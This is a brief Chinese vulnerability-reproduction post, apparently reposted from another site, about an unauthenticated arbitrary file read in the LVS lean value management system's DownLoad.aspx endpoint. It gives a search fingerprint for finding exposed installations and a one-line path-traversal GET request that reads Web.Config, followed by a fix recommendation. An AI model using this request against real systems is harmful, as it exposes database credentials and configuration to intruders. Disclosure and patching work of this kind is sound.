LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现-白红宇

LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现

阅读量：790 次

发布时间：2023-02-06

本文共 486 字，大约阅读时间需要 1 分钟。

LVS精益价值管理系统是一款专注于企业精益化管理和价值流优化的解决方案。该系统通过集成先进的数据分析工具、可视化的价值流映射技术和灵活的流程改善机制，帮助企业实现高效、低耗、高质量的生产和服务。

系统中存在一个严重的安全漏洞，具体位于`LVS精益价值管理系统 DownLoad.aspx`接口处。该漏洞未经身份验证，攻击者可利用此漏洞读取系统重要文件，包括数据库配置文件和系统配置文件等，导致网站处于极度不安全状态。

通过对系统进行测试，确认该漏洞存在于以下环境中：

body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

已找到漏洞的复现方法（PoC），具体操作如下：

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1  Host: your-ip  User:

该漏洞的发现和复现证明了系统的安全性存在重大漏洞，建议及时修复以防止潜在的安全威胁。

转载地址：http://zxufk.baihongyu.com/

你可能感兴趣的文章